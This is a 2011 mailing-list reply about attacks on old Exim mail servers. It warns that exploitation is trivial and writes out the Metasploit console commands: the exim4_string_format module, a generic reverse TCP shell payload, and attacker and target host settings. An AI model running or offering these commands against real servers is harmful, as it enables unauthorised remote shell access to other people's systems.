On 12/01/2011 13:36, Ted Cooper wrote:
> There is the possibility that this has become part of some script kiddie
> exploit kit now so there may be more of these attacks against servers
> running old versions. Luckily it's not very well written and falls over
> fairly quickly.
There's a Metasploit module for it as well:
http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format
So exploiting it is as simple as:
1. install Metasploit
2. run Metasploit
3. Type:
use exploit/unix/smtp/exim4_string_format
set payload generic/shell_reverse_tcp
set LHOST my.ip
set RHOST target.ip
exploit
--
Mike Cardwell
https://secure.grepular.com/ https://twitter.com/mickeyc
Professional
http://cardwellit.com/ http://linkedin.com/in/mikecardwell
PGP.mit.edu 0018461F/35BC AF1D 3AA2 1F84 3DC3 B0CF 70A5 F512 0018 461F